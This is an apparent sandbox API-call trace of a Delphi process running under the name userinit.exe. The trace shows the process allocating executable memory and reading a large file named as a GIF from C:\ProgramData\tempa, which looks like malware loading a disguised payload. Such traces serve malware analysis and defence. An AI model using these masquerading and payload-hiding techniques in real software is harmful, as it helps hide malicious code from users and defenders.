[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x22f994, cchData=2 | out: lpLCData=",") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x22f994, cchData=2 | out: lpLCData=".") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x22f89c, cchData=256 | out: lpLCData="2") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x22f994, cchData=2 | out: lpLCData="/") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x22f89c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0199.154] GetThreadLocale () returned 0x409
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22f868, cchData=256 | out: lpLCData="1") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x22f89c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0199.154] GetThreadLocale () returned 0x409
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x22f868, cchData=256 | out: lpLCData="1") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x22f994, cchData=2 | out: lpLCData=":") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x22f89c, cchData=256 | out: lpLCData="AM") returned 3
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x22f89c, cchData=256 | out: lpLCData="PM") returned 3
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x22f89c, cchData=256 | out: lpLCData="0") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x22f89c, cchData=256 | out: lpLCData="0") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x22f89c, cchData=256 | out: lpLCData="0") returned 2
[0199.154] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x22f994, cchData=2 | out: lpLCData=",") returned 2
[0199.154] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0199.154] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0199.154] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0199.155] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0199.156] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0199.156] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0199.156] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0199.156] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0199.156] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0199.156] GetDC (hWnd=0x0) returned 0x56010821
[0199.156] GetDeviceCaps (hdc=0x56010821, index=90) returned 96
[0199.156] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0199.156] GetDC (hWnd=0x0) returned 0x56010821
[0199.156] GetDeviceCaps (hdc=0x56010821, index=104) returned 0
[0199.156] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0199.156] CreatePalette (plpal=0x22f5f8) returned 0x2f08086d
[0199.156] GetStockObject (i=7) returned 0x1b00017
[0199.156] GetStockObject (i=5) returned 0x1900015
[0199.156] GetStockObject (i=13) returned 0x18a002e
[0199.157] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0199.157] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0199.157] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0199.157] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0199.158] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0199.159] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x22f5f4, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0199.159] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0199.159] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0199.159] GetVersion () returned 0x1db10106
[0199.159] GetCurrentProcessId () returned 0x8e8
[0199.159] GlobalAddAtomA (lpString="Delphi000008E8") returned 0xc0f1
[0199.159] GetCurrentThreadId () returned 0x8e4
[0199.159] GlobalAddAtomA (lpString="ControlOfs00400000000008E4") returned 0xc0f0
[0199.159] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000008E4") returned 0xc18a
[0199.159] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0199.159] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0199.159] GetSystemMetrics (nIndex=19) returned 1
[0199.167] GetSystemMetrics (nIndex=75) returned 1
[0199.167] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0199.167] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0199.167] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0199.167] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x14022d
[0199.168] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0199.168] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0199.168] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0199.168] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x110229
[0199.168] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x12021d
[0199.168] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x120219
[0199.168] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x130217
[0199.169] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x120215
[0199.169] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x1001e3
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0199.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0199.169] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0199.169] GetDC (hWnd=0x0) returned 0x56010821
[0199.169] GetDeviceCaps (hdc=0x56010821, index=90) returned 96
[0199.169] ReleaseDC (hWnd=0x0, hDC=0x56010821) returned 1
[0199.169] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0199.169] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0199.170] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x22f95f, fWinIni=0x0 | out: pvParam=0x22f95f) returned 1
[0199.170] CreateFontIndirectA (lplf=0x22f95f) returned 0x2e0a08a0
[0199.170] GetObjectA (in: h=0x2e0a08a0, c=60, pv=0x22f750 | out: pv=0x22f750) returned 60
[0199.170] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x22f80b, fWinIni=0x0 | out: pvParam=0x22f80b) returned 1
[0199.170] CreateFontIndirectA (lplf=0x22f8e7) returned 0x420a089c
[0199.170] GetObjectA (in: h=0x420a089c, c=60, pv=0x22f750 | out: pv=0x22f750) returned 60
[0199.170] CreateFontIndirectA (lplf=0x22f8ab) returned 0x870a0888
[0199.170] GetObjectA (in: h=0x870a0888, c=60, pv=0x22f750 | out: pv=0x22f750) returned 60
[0199.170] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0199.170] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x22f8bf, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0199.170] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x22f8bf | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0199.171] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x60000
[0199.171] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x22f874 | out: lpWndClass=0x22f874) returned 0
[0199.171] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0199.171] GetSystemMetrics (nIndex=0) returned 1440
[0199.171] GetSystemMetrics (nIndex=1) returned 900
[0199.171] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x1401e8
[0199.175] SetWindowLongA (hWnd=0x1401e8, nIndex=-4, dwNewLong=397295) returned 4219500
[0199.175] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0199.175] SendMessageA (hWnd=0x1401e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0199.175] DefWindowProcA (hWnd=0x1401e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0199.185] DefWindowProcA (hWnd=0x1401e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x1101cd
[0199.186] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0199.186] SetClassLongA (hWnd=0x1401e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0199.187] GetSystemMenu (hWnd=0x1401e8, bRevert=0) returned 0xe01af
[0199.188] DeleteMenu (hMenu=0xe01af, uPosition=0xf030, uFlags=0x0) returned 1
[0199.188] DeleteMenu (hMenu=0xe01af, uPosition=0xf000, uFlags=0x0) returned 1
[0199.188] DeleteMenu (hMenu=0xe01af, uPosition=0xf010, uFlags=0x0) returned 1
[0199.188] GetKeyboardLayoutList (in: nBuff=64, lpList=0x22f840 | out: lpList=0x22f840) returned 1
[0199.189] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0199.189] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0199.190] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d740000
[0199.190] GetProcAddress (hModule=0x6d740000, lpProcName="InitializeFlatSB") returned 0x6d77266f
[0199.190] GetProcAddress (hModule=0x6d740000, lpProcName="UninitializeFlatSB") returned 0x6d772542
[0199.190] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollProp") returned 0x6d771d29
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollProp") returned 0x6d77238d
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7720c9
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d771fdb
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollRange") returned 0x6d771e8d
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d771f0f
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollPos") returned 0x6d771ccd
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollPos") returned 0x6d77216d
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7722be
[0199.191] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7721e2
[0199.191] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0199.191] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0199.191] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0199.191] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0199.191] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0199.191] GetCurrentThreadId () returned 0x8e4
[0199.191] GlobalAddAtomA (lpString="WndProcPtr00400000000008E4") returned 0xc0ef
[0199.192] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0199.192] ShowWindow (hWnd=0x1401e8, nCmdShow=0) returned 0
[0199.192] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0199.192] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0199.192] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f5c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x22f5c0*=0) returned 0x0
[0199.192] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f5b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x22f5b8*=0) returned 0x0
[0199.192] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f5b8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22f5b8*=0) returned 0x10be00
[0199.192] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x22f5b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x22f5b8*=0) returned 0x0
[0199.193] GlobalLock (hMem=0x680004) returned 0x2300020
[0199.193] ReadFile (in: hFile=0x98, lpBuffer=0x2300020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x22f5d4, lpOverlapped=0x0 | out: lpBuffer=0x2300020*, lpNumberOfBytesRead=0x22f5d4*=0x10be00, lpOverlapped=0x0) returned 1
[0199.234] CloseHandle (hObject=0x98) returned 1
[0199.234] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.234] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.234] GlobalUnlock (hMem=0x68000c) returned 0
[0199.234] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4000, uFlags=0x2) returned 0x68000c
[0199.234] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.235] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.235] GlobalUnlock (hMem=0x68000c) returned 0
[0199.235] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6000, uFlags=0x2) returned 0x68000c
[0199.235] GlobalLock (hMem=0x68000c) returned 0x9a820
[0199.236] GlobalHandle (pMem=0x9a820) returned 0x68000c
[0199.236] GlobalUnlock (hMem=0x68000c) returned 0
[0199.236] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8000, uFlags=0x2) returned 0x68000c
[0199.236] GlobalLock (hMem=0x68000c) returned 0xa0830
[0199.237] GlobalHandle (pMem=0xa0830) returned 0x68000c
[0199.237] GlobalUnlock (hMem=0x68000c) returned 0
[0199.237] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa000, uFlags=0x2) returned 0x68000c
[0199.237] GlobalLock (hMem=0x68000c) returned 0xa0830
[0199.237] GlobalHandle (pMem=0xa0830) returned 0x68000c
[0199.237] GlobalUnlock (hMem=0x68000c) returned 0
[0199.237] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc000, uFlags=0x2) returned 0x68000c
[0199.238] GlobalLock (hMem=0x68000c) returned 0xaa840
[0199.238] GlobalHandle (pMem=0xaa840) returned 0x68000c
[0199.238] GlobalUnlock (hMem=0x68000c) returned 0
[0199.238] GlobalReAlloc (hMem=0x68000c, dwBytes=0xe000, uFlags=0x2) returned 0x68000c
[0199.238] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.239] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.239] GlobalUnlock (hMem=0x68000c) returned 0
[0199.239] GlobalReAlloc (hMem=0x68000c, dwBytes=0x10000, uFlags=0x2) returned 0x68000c
[0199.239] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.239] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.239] GlobalUnlock (hMem=0x68000c) returned 0
[0199.239] GlobalReAlloc (hMem=0x68000c, dwBytes=0x12000, uFlags=0x2) returned 0x68000c
[0199.239] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.240] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.240] GlobalUnlock (hMem=0x68000c) returned 0
[0199.240] GlobalReAlloc (hMem=0x68000c, dwBytes=0x14000, uFlags=0x2) returned 0x68000c
